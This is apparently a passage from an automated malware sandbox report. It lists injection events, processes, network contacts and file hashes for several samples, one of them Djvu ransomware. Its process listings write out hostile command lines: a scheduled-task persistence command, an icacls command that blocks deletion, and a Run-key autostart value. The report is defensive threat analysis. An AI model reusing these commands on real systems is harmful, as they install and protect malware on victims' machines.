N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe N/A
N/A N/A C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe N/A
N/A N/A C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sant.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\ProgramData\ucp\usc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5644 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\yaya.exe
PID 5644 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\yaya.exe
PID 5644 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\yaya.exe
PID 5644 wrote to memory of 5336 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\va.exe
PID 5644 wrote to memory of 5336 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\va.exe
PID 5644 wrote to memory of 5336 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\va.exe
PID 5644 wrote to memory of 5528 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\ufx.exe
PID 5644 wrote to memory of 5528 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\ufx.exe
PID 5644 wrote to memory of 5528 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\ufx.exe
PID 5644 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\sant.exe
PID 5644 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\sant.exe
PID 5644 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\sant.exe
PID 5644 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\power.exe
PID 5644 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\power.exe
PID 5644 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\HYDRA.exe C:\Users\Admin\AppData\Roaming\power.exe
PID 1092 wrote to memory of 760 N/A C:\Users\Admin\AppData\Roaming\yaya.exe C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe
PID 1092 wrote to memory of 760 N/A C:\Users\Admin\AppData\Roaming\yaya.exe C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe
PID 5528 wrote to memory of 5888 N/A C:\Users\Admin\AppData\Roaming\ufx.exe C:\ProgramData\ucp\usc.exe
PID 5528 wrote to memory of 5888 N/A C:\Users\Admin\AppData\Roaming\ufx.exe C:\ProgramData\ucp\usc.exe
PID 5528 wrote to memory of 5888 N/A C:\Users\Admin\AppData\Roaming\ufx.exe C:\ProgramData\ucp\usc.exe
PID 5888 wrote to memory of 4672 N/A C:\ProgramData\ucp\usc.exe C:\Windows\SysWOW64\SCHTASKS.exe
PID 5888 wrote to memory of 4672 N/A C:\ProgramData\ucp\usc.exe C:\Windows\SysWOW64\SCHTASKS.exe
PID 5888 wrote to memory of 4672 N/A C:\ProgramData\ucp\usc.exe C:\Windows\SysWOW64\SCHTASKS.exe
PID 760 wrote to memory of 684 N/A C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 760 wrote to memory of 684 N/A C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 684 wrote to memory of 5348 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 684 wrote to memory of 5348 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 224 wrote to memory of 728 N/A C:\Users\Admin\AppData\Roaming\sant.exe C:\Windows\SysWOW64\explorer.exe
PID 224 wrote to memory of 728 N/A C:\Users\Admin\AppData\Roaming\sant.exe C:\Windows\SysWOW64\explorer.exe
PID 224 wrote to memory of 728 N/A C:\Users\Admin\AppData\Roaming\sant.exe C:\Windows\SysWOW64\explorer.exe
PID 4492 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Roaming\power.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Roaming\power.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Roaming\power.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\HYDRA.exe

"C:\Users\Admin\AppData\Local\Temp\HYDRA.exe"

C:\Users\Admin\AppData\Roaming\yaya.exe

C:\Users\Admin\AppData\Roaming\yaya.exe

C:\Users\Admin\AppData\Roaming\va.exe

C:\Users\Admin\AppData\Roaming\va.exe

C:\Users\Admin\AppData\Roaming\ufx.exe

C:\Users\Admin\AppData\Roaming\ufx.exe

C:\Users\Admin\AppData\Roaming\sant.exe

C:\Users\Admin\AppData\Roaming\sant.exe

C:\Users\Admin\AppData\Roaming\power.exe

C:\Users\Admin\AppData\Roaming\power.exe

C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe

"C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe"

C:\ProgramData\ucp\usc.exe

"C:\ProgramData\ucp\usc.exe" /ucp/usc.exe

C:\Windows\SysWOW64\SCHTASKS.exe

SCHTASKS /Create /SC MINUTE /MO 10 /F /TN SystemOptimize /TR C:\ProgramData\ucp\usc.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hqsi_zti.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA7CA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA7B9.tmp"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\ersatbtf\jsbsgjba.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 psix.tk udp
US 8.8.8.8:53 minercoinbox.com udp
GB 95.101.143.201:80 www.bing.com tcp
US 8.8.8.8:53 java.com udp
GB 95.101.143.183:443 java.com tcp
US 8.8.8.8:53 visualstudio.microsoft.com udp
GB 23.214.136.41:443 visualstudio.microsoft.com tcp
RU 92.53.105.14:80 tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 95.100.245.144:443 www.microsoft.com tcp
US 8.8.8.8:53 www.visualstudio.com udp
GB 23.49.172.241:443 www.visualstudio.com tcp
US 8.8.8.8:53 www.videolan.org udp
FR 213.36.253.2:443 www.videolan.org tcp
US 8.8.8.8:53 www.mozilla.org udp
US 151.101.131.19:443 www.mozilla.org tcp
US 8.8.8.8:53 java.com udp
GB 95.101.143.183:443 java.com tcp
RU 92.53.105.14:80 tcp
US 8.8.8.8:53 java.com udp
GB 95.101.143.183:443 java.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 95.100.245.144:443 www.microsoft.com tcp
US 8.8.8.8:53 www.visualstudio.com udp
GB 23.49.172.241:443 www.visualstudio.com tcp
GB 95.101.143.183:443 java.com tcp
GB 95.101.143.183:443 java.com tcp

Files

C:\Users\Admin\AppData\Roaming\yaya.exe

MD5 7d05ab95cfe93d84bc5db006c789a47f
SHA1 aa4aa0189140670c618348f1baad877b8eca04a4
SHA256 5c32e0d2a69fd77e85f2eecaabeb677b6f816de0d82bf7c29c9d124a818f424f
SHA512 40d1461e68994df56f19d9f7b2d96ffdc5300ca933e10dc53f7953471df8dea3aabeb178c3432c6819175475cadcbdb698384e3df57b3606c6fce3173a31fe84

C:\Users\Admin\AppData\Roaming\va.exe

MD5 c084e736931c9e6656362b0ba971a628
SHA1 ef83b95fc645ad3a161a19ccef3224c72e5472bd
SHA256 3139bf3c4b958c3a019af512aecdb8161b9d6d7432d2c404abda3f42b63f34f1
SHA512 cbd6485840a117b52e24586da536cefa94ca087b41eb460d27bc2bd320217957c9e0e96b0daf74343efde2e23a5242e7a99075aabf5f9e18e03b52eb7151ae1f

memory/5336-13-0x0000000000400000-0x000000000041C000-memory.dmp

memory/224-19-0x0000000000400000-0x0000000000404000-memory.dmp

C:\Users\Admin\AppData\Roaming\ufx.exe

MD5 22e088012519e1013c39a3828bda7498
SHA1 3a8a87cce3f6aff415ee39cf21738663c0610016
SHA256 9e3826138bacac89845c26278f52854117db1652174c1c76dbb2bd24f00f4973
SHA512 5559e279dd3d72b2c9062d88e99212bbc67639fe5a42076efd24ae890cfce72cfe2235adb20bf5ed1f547b6da9e69effa4ccb80c0407b7524f134a24603ea5a8

C:\Users\Admin\AppData\Roaming\sant.exe

MD5 5effca91c3f1e9c87d364460097f8048
SHA1 28387c043ab6857aaa51865346046cf5dc4c7b49
SHA256 3fd826fc0c032721466b94ab3ec7dcfe006cc284e16132af6b91dfbc064b0907
SHA512 b0dba30fde295d3f7858db9d1463239b30cd84921971032b2afb96f811a53ac12c1e6f72013d2eff397b0b89c371e7c023c951cd2102f94157cba9918cd2c3e0

memory/224-20-0x0000000000110000-0x000000000011A000-memory.dmp

C:\Users\Admin\AppData\Roaming\power.exe

MD5 743f47ae7d09fce22d0a7c724461f7e3
SHA1 8e98dd1efb70749af72c57344aab409fb927394e
SHA256 1bee45423044b5a6bf0ad0dd2870117824b000784ce81c5f8a1b930bb8bc0465
SHA512 567993c3b798365efa07b7a46fda98494bfe540647f27654764e78b7f60f093d403b77b9abb889cfb09b44f13515ce3c041fc5db05882418313c3b3409dd77bf

memory/224-24-0x0000000000110000-0x000000000011A000-memory.dmp

C:\ProgramData\ucp\usc.exe

MD5 b100b373d645bf59b0487dbbda6c426d
SHA1 44a4ad2913f5f35408b8c16459dcce3f101bdcc7
SHA256 84d7fd0a93d963e9808212917f79fe2d485bb7fbc94ee374a141bbd15da725b7
SHA512 69483fed79f33da065b1cc65a2576ba268c78990545070f6f76fca8f48aaec8274faecdc9bcf92bf84a87809a318b159d1a3c835f848a6eea6c163f41612bf9b

C:\Windows\Temp\{1945BBS40-8571-3DA1-BB29-HYDRA7A13A1E}\starter.exe

MD5 51bf85f3bf56e628b52d61614192359d
SHA1 c1bc90be6a4beb67fb7b195707798106114ec332
SHA256 990dffdc0694858514d6d7ff7fff5dc9f48fab3aa35a4d9301d94fc57e346446
SHA512 131173f3aabcfba484e972424c54201ec4b1facfb2df1efe08df0d43a816d4df03908b006884564c56a6245badd4f9ed442a295f1db2c0c970a8f80985d35474

memory/1092-55-0x0000000000400000-0x000000000047B000-memory.dmp

memory/760-58-0x000000001B730000-0x000000001BBFE000-memory.dmp

memory/760-59-0x000000001BC00000-0x000000001BC9C000-memory.dmp

memory/760-60-0x0000000000A40000-0x0000000000A48000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\hqsi_zti.cmdline

MD5 d64f5440876fff0be05e6fd89b9cb1cc
SHA1 eefc1787854e938b0036dd8ad9aced46dc7fd08f
SHA256 31a3695e1b61c976626f78d4159fac6db71a2dae1460a4b7ec709cc4b5527769
SHA512 bb3ccb99e5e24c15de5ff384965e3a3853f71a940bd06fb26455c3c5f0f3d8adcd2966b685df5895e677b7b33c49d5446e935c5a667bed6902d6c90c5cdcb005

\??\c:\Users\Admin\AppData\Local\Temp\hqsi_zti.0.cs

MD5 a0d1b6f34f315b4d81d384b8ebcdeaa5
SHA1 794c1ff4f2a28e0c631a783846ecfffdd4c7ae09
SHA256 0b3a3f8f11eb6f50fe67943f2b73c5824614f31c2e0352cc234927d7cb1a52e0
SHA512 0a89293d731c5bca05e73148f85a740b324fc877f2fb05cde1f68e2098329fbca552d78249a46f4a1da15a450c8e754c73be20c652f7089d5cfec445ce950a0e

\??\c:\Users\Admin\AppData\Local\Temp\CSCA7B9.tmp

MD5 9d2d3d79b1136a85f2e8409ec5aa9c5e
SHA1 adaad3338838b7669a48bee51337346a39a2eb00
SHA256 016bd17acbd598e53d52c3a51cec2847cc1a366d670e3fc0416fa7fb68e0e3c2
SHA512 5e6978279364fee3254b3d205e2e4fd8774c2f2272be3f565b8969e9ac007e01b72ebd26a709225c592d4eb8755c6cddc96ed79c2c7221caae29efdf80c3181a

C:\Users\Admin\AppData\Local\Temp\RESA7CA.tmp

MD5 7d8b33f4050b47651733cef60601950f
SHA1 0eb3d60590c42a9850e4f64ef4d6f59e23670425
SHA256 c3d2f36c539b9aa1f78567d2ebf36be2956c56e02fd01457894752397226aa3f
SHA512 809547596023c015c8fc85fa1d810d044e933a8fee45f6160fc4cd779686dd367c2a6ad6ed7f053b1943eb5315c7c996598013e175935cde94e97907ecfc47a4

C:\Users\Admin\AppData\Local\Temp\hqsi_zti.dll

MD5 32bfa4370209018bd90caee40f73c4c7
SHA1 a5df285a6fc8500622261873e26e839261d04ae6
SHA256 ed4eb007e34ca0af2a8547ba90a7295ef0beeec05ed963416cc7b41054b443bc
SHA512 4a369390bc6bd2444939dbd061225c290c0de21bb85633359ec2c4f59b5bcf56ddafeefb28ccd5bf8be8b463fb2b297fbf7ebb01e675645303ace23c8517ba7c

memory/760-74-0x0000000000A60000-0x0000000000A68000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\hqsi_zti.pdb

MD5 c3711fe194ee721243afc7101bc5dbd0
SHA1 d040cc83c523f173233a4449257edc7d2c904b2a
SHA256 4ef4abb30f7ae24ca7afd8198d3f616599bed5cb3fe3361b4b83b401c41391b3
SHA512 789556923e1368172a518ee6f535b508ced49f8b28c12effcbbbfae0849f99bcffc448d38ef15c819fe08d34b35a44942ec4b1d2556c929a5f9814d8799c2b38

memory/224-78-0x0000000000110000-0x000000000011A000-memory.dmp

memory/4492-79-0x0000000000400000-0x0000000000485000-memory.dmp

memory/728-80-0x00000000005E0000-0x0000000000A13000-memory.dmp

memory/728-81-0x00000000005E0000-0x0000000000A13000-memory.dmp

memory/728-82-0x0000000000B20000-0x0000000000B2A000-memory.dmp

memory/728-91-0x0000000000B20000-0x0000000000B2A000-memory.dmp

memory/728-89-0x0000000000B20000-0x0000000000B2A000-memory.dmp

memory/224-92-0x0000000000110000-0x000000000011A000-memory.dmp

memory/4492-96-0x0000000000400000-0x0000000000485000-memory.dmp

memory/4932-97-0x0000000002BF0000-0x0000000002C26000-memory.dmp

memory/4932-98-0x00000000057C0000-0x0000000005DE8000-memory.dmp

memory/4932-99-0x0000000005580000-0x00000000055A2000-memory.dmp

memory/4932-100-0x0000000005E60000-0x0000000005EC6000-memory.dmp

memory/4932-101-0x0000000005ED0000-0x0000000005F36000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ihttrvbc.01r.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4932-111-0x0000000005F40000-0x0000000006294000-memory.dmp

memory/4932-112-0x0000000006540000-0x000000000655E000-memory.dmp

memory/4932-113-0x0000000006560000-0x00000000065AC000-memory.dmp

memory/4932-114-0x0000000006A70000-0x0000000006AB4000-memory.dmp

memory/4932-115-0x0000000007830000-0x00000000078A6000-memory.dmp

memory/4932-116-0x0000000007F30000-0x00000000085AA000-memory.dmp

memory/4932-117-0x00000000078D0000-0x00000000078EA000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

110s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.exe"

Signatures

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\iaStorE.sys C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp N/A

Checks for any installed AV software in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\MS.dat C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp N/A
File created C:\Windows\system32\KeyHook64.dll C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp N/A
File created C:\Windows\system32\KH.dat C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp N/A
File created C:\Windows\system32\usp20.dll C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp N/A
File created C:\Windows\system32\UP.dat C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp N/A
File created C:\Windows\system32\spoolsr.exe C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp N/A

Processes

C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.exe

"C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.exe"

C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp

C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp -install

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 iostream.system.band udp
US 52.43.119.120:80 iostream.system.band tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp

MD5 4b042bfd9c11ab6a3fb78fa5c34f55d0
SHA1 b0f506640c205d3fbcfe90bde81e49934b870eab
SHA256 59c662a5207c6806046205348b22ee45da3f685fe022556716dbbd6643e61834
SHA512 dae5957c8eee5ae7dd106346f7ea349771b693598f3d4d54abb39940c3d1a0b5731c8d4e07c29377838988a1e93dcd8c2946ce0515af87de61bca6de450409d3

Analysis: behavioral11

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:14

Platform

win10v2004-20250502-en

Max time kernel

141s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c2716fcc735a4f1b9fce29cb1dc20a26969b71f615e2b119e9680f015379d286.exe"

Signatures

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Djvu family

djvu

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\c2716fcc735a4f1b9fce29cb1dc20a26969b71f615e2b119e9680f015379d286.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\238105d5-acec-4460-a64f-f65c577ece3d\\c2716fcc735a4f1b9fce29cb1dc20a26969b71f615e2b119e9680f015379d286.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\c2716fcc735a4f1b9fce29cb1dc20a26969b71f615e2b119e9680f015379d286.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\c2716fcc735a4f1b9fce29cb1dc20a26969b71f615e2b119e9680f015379d286.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\c2716fcc735a4f1b9fce29cb1dc20a26969b71f615e2b119e9680f015379d286.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\c2716fcc735a4f1b9fce29cb1dc20a26969b71f615e2b119e9680f015379d286.exe

"C:\Users\Admin\AppData\Local\Temp\c2716fcc735a4f1b9fce29cb1dc20a26969b71f615e2b119e9680f015379d286.exe"

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\238105d5-acec-4460-a64f-f65c577ece3d" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\c2716fcc735a4f1b9fce29cb1dc20a26969b71f615e2b119e9680f015379d286.exe

"C:\Users\Admin\AppData\Local\Temp\c2716fcc735a4f1b9fce29cb1dc20a26969b71f615e2b119e9680f015379d286.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5456 -ip 5456

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5456 -s 1876

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.2ip.ua udp
US 104.21.32.1:443 api.2ip.ua tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
US 104.21.32.1:443 api.2ip.ua tcp
US 8.8.8.8:53 dell1.ug udp
US 8.8.8.8:53 dell1.ug udp
US 8.8.8.8:53 dell1.ug udp
US 8.8.8.8:53 dell1.ug udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

memory/5456-1-0x0000000002370000-0x0000000002436000-memory.dmp

memory/5456-2-0x0000000002440000-0x000000000255A000-memory.dmp

memory/5456-3-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\238105d5-acec-4460-a64f-f65c577ece3d\c2716fcc735a4f1b9fce29cb1dc20a26969b71f615e2b119e9680f015379d286.exe

MD5 e15e3cfa542459e8d87e8bfdf70a38a1
SHA1 1c98fbf7b780fc8ab7f73d468ab77b41570c9665
SHA256 c2716fcc735a4f1b9fce29cb1dc20a26969b71f615e2b119e9680f015379d286
SHA512 fd55639cc4f757f90a01236b10bf33bd678ef7a141c6538a5285133aa8d610bb0bf287043717557a26d28a924f3c44fbf37c13421f27a389f2e8fc76ce4b91fe

memory/5908-15-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

MD5 1fbb37f79b317a9a248e7c4ce4f5bac5
SHA1 0ff4d709ebf17be0c28e66dc8bf74672ca28362a
SHA256 6fb1b8e593cb0388f67ead35313a230f524657317ea86271b3a97362e5ec6ad9
SHA512 287e1d62c9ceb660965c266f677c467fbb997c2f5dcd1d63e185e266488aafc3489ac1d3feec81d10f01ce4a72e61a8bc4e124f137ce8675a220aa7797002e74

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

MD5 87b88cb16bb1e5b40119c371eb576089
SHA1 44765ee94e20a2d8966b55ce55520b805843c709
SHA256 7b0a7367b439b1ce7c129c7f69b8e60aa11783012c2f2708325ba3fca7c8576b
SHA512 d3be82aa0fa9e808e8e5862b7a356208e63404f1bd7de7abb3669a4969e9c8862b18170d4b13dd1e014cbddf56b84fe5072cba24e148fe96e29642ce7d4e6712

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 4a90329071ae30b759d279cca342b0a6
SHA1 0ac7c4f3357ce87f37a3a112d6878051c875eda5
SHA256 fb6a7c3edcd7b97fabc18855102a39fc4d6d3f82c0fdd39b1667807b71b9c49b
SHA512 f0e206053d4369437c2c0f1f90f0fd03d631e4b9859d807049b41efde823d64cf4d75c28316d932360f7c03bd409e923c8bc2d4f5959361feacecfcf101ae823

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 cfc07f9f57af01992ec634040aee5e94
SHA1 31c0bcdb985987f054a0e97095d060b8c069b03d
